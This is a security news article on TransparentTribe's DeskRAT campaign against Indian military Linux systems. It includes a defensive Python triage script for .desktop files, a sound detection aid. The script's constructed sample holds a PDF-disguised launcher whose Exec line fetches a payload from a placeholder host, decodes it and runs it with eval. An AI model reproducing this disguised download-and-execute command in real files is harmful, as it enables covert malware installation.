TransparentTribe Attack Linux-Based Systems of Indian Military Organizations to Deliver DeskRAT

TransparentTribe, a Pakistani-nexus intrusion set active since at least 2013, has intensified its cyber espionage operations targeting Linux-based systems of Indian military and defense organizations.

The campaign, initially documented in July 2025 by CYFIRMA with activity traced back to June 2025, has evolved significantly with the development of a sophisticated Golang-based remote access trojan dubbed DeskRAT.

This malware represents a notable escalation in the group’s technical capabilities, demonstrating their commitment to maintaining strategic cyber dominance against Indian defense interests.

The attack campaign employs a deceptively simple yet effective multi-stage delivery mechanism that begins with phishing emails containing malicious ZIP archives.

These archives are disguised with innocuous-sounding names such as “MoM_regarding_Defence_Sectors_by_Secy_Defence” to evade initial detection.

Upon extraction, the archives reveal a DESKTOP file that masquerades as a legitimate PDF document, complete with a PDF icon to reinforce the deception.

When executed by unsuspecting users, the file triggers a complex infection chain that ultimately establishes persistent remote access to compromised systems.

Sekoia analysts identified and analyzed the evolution of this campaign through their threat detection systems, discovering new samples in August and September 2025 that revealed an updated infection chain.

Infection chain leading to the installation of DeskRAT (Source – Sekoia)

The researchers implemented multiple YARA rules to track the activity and found samples that were previously unknown to other security vendors, indicating the group’s efforts to stay ahead of conventional detection mechanisms.

This discovery underscores the sophistication and evolving nature of TransparentTribe’s operations.

The technical infrastructure supporting this campaign has also undergone refinement. Initial phishing emails directed targets to ZIP files hosted on legitimate cloud services such as Google Drive, but the operation has since shifted to dedicated staging servers.

This evolution demonstrates operational security awareness and an attempt to avoid reliance on third-party platforms that could be more easily monitored or suspended by security teams.

Deceptive Infection Mechanism Through Embedded Obfuscation

The DESKTOP file employed in this campaign contains a particularly ingenious obfuscation technique that hides malicious Bash commands within thousands of lines of commented PNG image data.

The actual [Desktop Entry] section containing the malware execution instructions is strategically placed between two massive blocks of PNG data, effectively concealing the payload from casual inspection.

This layering technique exploits the fact that a typical user reviewing the file would encounter overwhelming amounts of image data before discovering the embedded commands.

The Bash one-liner executed upon file activation orchestrates a sophisticated multi-stage payload delivery.

The command first generates a unique filename in the /tmp/ directory using a timestamp, then downloads an encoded binary from the remote staging server using curl with specific error-handling flags.

The downloaded content undergoes two decoding steps: a hexadecimal-to-binary conversion using xxd, followed by Base64 decoding.

Once decoded, the payload executes directly through eval, gaining immediate control of the system.

Simultaneously, the infection chain launches Firefox to display a decoy PDF document hosted on the attacker’s server, creating the illusion of a legitimate document opening while the RAT silently establishes its presence.

This coordinated execution provides social engineering cover for the malware installation.
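The two traits described above, a [Desktop Entry] group buried between thousands of comment lines and an Exec= value that downloads, decodes and evaluates a payload, are both cheap to check for in a triage script. The following Python is an added example written for this article, not code from Sekoia or from the campaign; the .desktop sample it scans is constructed, with a non-resolving placeholder host, and only mimics the layout the text describes.

```python
import re
from typing import Dict, List

# Constructed sample: filler comment lines standing in for the commented-out PNG
# data, with the real [Desktop Entry] group sandwiched between two large blocks.
PADDING = "\n".join("# iVBORw0KGgo" + "A" * 50 for _ in range(1500))
SAMPLE_DESKTOP = (
    PADDING + "\n[Desktop Entry]\nType=Application\nName=Constructed_Report.pdf\n"
    "Icon=application-pdf\nTerminal=false\n"
    'Exec=bash -c "f=/tmp/$(date +%s);curl -sf http://staging.invalid/x -o $f;'
    'eval $(xxd -r -p $f | base64 -d);firefox http://staging.invalid/decoy.pdf"\n'
    + PADDING + "\n"
)

# Tokens that together form the download / decode / execute chain in the text.
SUSPICIOUS_TOKENS = ("curl ", "wget ", "xxd ", "base64 -d", "base64 --decode", "eval ", "/tmp/")

def parse_desktop_entry(text: str) -> Dict[str, str]:
    """Return key=value pairs of the [Desktop Entry] group, skipping '#' comment lines."""
    entry: Dict[str, str] = {}
    in_group = False
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if stripped.startswith("[") and stripped.endswith("]"):
            in_group = stripped == "[Desktop Entry]"
            continue
        if in_group and "=" in stripped:
            key, _, value = stripped.partition("=")
            entry[key.strip()] = value.strip()
    return entry

def comment_ratio(text: str) -> float:
    """Fraction of non-blank lines that are comments; near 1.0 signals padding."""
    lines = [l for l in text.splitlines() if l.strip()]
    return sum(1 for l in lines if l.lstrip().startswith("#")) / len(lines) if lines else 0.0

def triage_desktop_file(text: str) -> List[str]:
    """Return human-readable findings for a .desktop file; empty list means nothing flagged."""
    findings: List[str] = []
    entry = parse_desktop_entry(text)
    exec_cmd = entry.get("Exec", "")
    ratio = comment_ratio(text)
    if ratio > 0.9 and text.count("\n") > 500:
        findings.append(f"comment padding: {ratio:.0%} of lines are comments")
    looks_like_pdf = entry.get("Icon", "").lower() in ("application-pdf", "pdf") \
        or entry.get("Name", "").lower().endswith(".pdf")
    if looks_like_pdf and entry.get("Type") == "Application":
        findings.append("PDF disguise: launcher presents itself as a PDF document")
    hits = [t.strip() for t in SUSPICIOUS_TOKENS if t in exec_cmd]
    if hits:
        findings.append("download/decode/exec chain in Exec: " + ", ".join(hits))
    if re.search(r"\b(bash|sh)\s+-c\b", exec_cmd):
        findings.append("Exec spawns an inline shell")
    return findings
```

Run `triage_desktop_file(open(path).read())` over .desktop files found in mail attachments or user home directories; a clean launcher such as `Exec=gedit %f` returns no findings.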

DeskRAT itself maintains command and control communications through WebSocket connections, enabling real-time interaction between the attackers and compromised systems.

The malware’s Golang implementation provides cross-platform compatibility and enhanced persistence capabilities, making it particularly effective against the diverse Linux environments deployed throughout Indian military infrastructure.

Tushar Subhra Dutta

Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.
